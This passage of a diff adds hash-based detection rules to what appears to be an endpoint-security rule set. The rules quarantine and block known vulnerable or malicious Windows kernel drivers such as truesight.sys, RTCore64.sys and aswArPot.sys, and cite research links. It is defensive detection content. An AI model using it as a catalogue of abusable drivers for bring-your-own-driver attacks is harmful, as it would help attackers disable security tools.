"2026-03-23T11:45:30.461557Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461566Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "12a636449a491ef3dc8688c5d25be9ebf785874f9c4573667eefd42139201aa4", + "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "86da8630-6524-55f6-86fa-3119d2d857dd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142558Z", + "creation_date": "2026-03-23T11:45:31.142560Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142566Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee94d33ba5d7718c87023e96dc6e263e0820fbf798168273f7f9266ab9f5aef8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "86e70f28-6163-5a96-bf9c-3ba205918805", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494763Z", + "creation_date": "2026-03-23T11:45:31.494765Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494770Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "727fe503800e3cc91f21bf08ab6da107804f37ea295bb72fafb5387d0030f204", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "86f02377-977d-5867-ad8e-89c9208aacc8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.986049Z", + "creation_date": "2026-03-23T11:45:29.986051Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.986056Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "22074c412bb82bd97768eba0cb40e451d75d969e94d0548af804aafc04ca02fd", + "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "86f2e6f9-dbd8-5a81-9b75-8839936abaf2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814439Z", + "creation_date": "2026-03-23T11:45:31.814442Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814451Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "05159d9a44a7b169ca8f314627a003203646244d05362de69b1f36b814fe2224", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "870746e4-b59d-5cce-a633-caa4e4f31a57", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969168Z", + "creation_date": "2026-03-23T11:45:29.969170Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969176Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"65008817eb97635826a8708a6411d7b50f762bab81304e457119d669382944c3", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "870dc787-9aab-547d-ab44-81b337d5d5ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483720Z", + "creation_date": "2026-03-23T11:45:31.483724Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483734Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c6c44bb8ee72f922baa6acb2ad626177d51c82f9f6594c372b51ae16a99e4d4c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "871f8463-4024-558e-a089-c300e2bdf0b1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832261Z", + "creation_date": "2026-03-23T11:45:30.832263Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832268Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e81facaffce754a2c9ecfa49aba81b236b229c682f1d284edd044ba936815285", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "871fc288-415a-5568-af82-ce0822f38b0b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820702Z", + "creation_date": "2026-03-23T11:45:30.820704Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820710Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bc453d428fc224960fa8cbbaf90c86ce9b4c8c30916ad56e525ab19b6516424e", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) 
[https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8722a1ae-2be3-511f-bc09-07ad73d2dc6c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612717Z", + "creation_date": "2026-03-23T11:45:29.612719Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612725Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8926be6aa6df3b5d20483e0e698ea14fa0fb760844468ed69143d7f503250349", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8733836e-a6ed-5f67-8ca0-9e5eb40fb68e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982853Z", + "creation_date": "2026-03-23T11:45:29.982855Z", 
+ "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982860Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9d530642aeb6524691d06b9e02a84e3487c9cdd86c264b105035d925c984823a", + "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "873e8945-3a91-5ec4-83da-e1238bdc3650", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460207Z", + "creation_date": "2026-03-23T11:45:30.460210Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460219Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5de78cf5f0b1b09e7145db84e91a2223c3ed4d83cceb3ef073c068cf88b9d444", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "874c16a7-3914-5668-8bfa-015b85f40d08", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156843Z", + "creation_date": "2026-03-23T11:45:31.156845Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156850Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "84af161109a74a85355f6f87e64b280950bd9bd60444f83a2915aa760b6090a5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "874e684a-ab3d-5b7f-bd88-280ca38e55e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971784Z", + "creation_date": "2026-03-23T11:45:29.971786Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971792Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c7ba2720675aada538c47fa9e8950a81b6df23f63fa181680e6232651abffbef", + "comment": "PowerTool Hacktool malicious driver (aka kEvP64.sys) [https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/HackTool.Win64.ToolPow.A/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "875a76c4-c07c-5059-a970-87c73778c0f1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481164Z", + "creation_date": "2026-03-23T11:45:31.481169Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481178Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f27ae0329768838beaeed1dfcc5e9b29f43b930019cb99ab1a634f79f404c1ba", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "875c3f83-d5c3-500b-a04b-444c6511395a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816906Z", + "creation_date": "2026-03-23T11:45:31.816910Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816918Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1d5efd09cae59c8377f6faa0b6563c8e7e362d5b0e010bcee1af9fde5862742c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "875e1e1c-58c1-5c0b-b4d0-6898d13ece60", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485737Z", + "creation_date": "2026-03-23T11:45:31.485741Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485751Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b067710a04f656914df1c39ece3db3a1ff33e25be0938ac4ac5beb609c7c25fd", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8765bbe7-d01c-5d0c-a550-5eaffb8d695a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144466Z", + "creation_date": "2026-03-23T11:45:32.144468Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144474Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a4c0e1bf3b397ebe5105a15dce686d7a171e01d5d4af32d67a8974de55afdf19", + "comment": "Vulnerable Kernel Driver (aka ProcObsrvesx.sys) [https://www.loldrivers.io/drivers/8a1a4a5d-3e41-4539-80cd-0cb751f7fab3/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "876a4c04-1093-5fb7-836a-867042eb9ce6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.476243Z", + "creation_date": "2026-03-23T11:45:31.476247Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476257Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bc2aacf2a7b4759dc416c62215ec054bb5be0578758bf50af6bee4518aaf2da7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "876cf23b-2226-5765-8990-6b5079cac3a9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474513Z", + "creation_date": "2026-03-23T11:45:31.474517Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474528Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6a0b6d3d6f5b0060b7b726aba2be928195eac02d9578bcb7bf0720f1253ea5d0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "87789c69-186d-55a7-a4eb-d32519aa3a42", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143779Z", + "creation_date": "2026-03-23T11:45:32.143781Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143787Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "52b1c4667ef36a02a0e6d7f147b8d4bc0e30645e6c88bd2984e53abc693bc18e", + "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "87795b7a-f8f5-5a41-a1c3-d04dcb8c2299", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831420Z", + "creation_date": "2026-03-23T11:45:30.831422Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831428Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5a3114c8a786568a23ac21ae9199a46a87a55e9682e918b0592f8f9fbcb148f8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "877c8c2d-b1de-5e45-815a-f03f22f84101", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142862Z", + "creation_date": "2026-03-23T11:45:31.142864Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142881Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d831b59f2940fbe46b818dd685e80930f034b760efad477aa51d55ab67259ac3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8785b208-9372-502a-804f-27e88a73e044", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487106Z", + "creation_date": "2026-03-23T11:45:31.487108Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487114Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c8b755be6751be0ece9e353495220ab5fa3d8f3ea217062a3c74d247e47d07dd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "878b928a-0010-50a6-891f-c4f767faec7b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466468Z", + "creation_date": "2026-03-23T11:45:30.466471Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466480Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
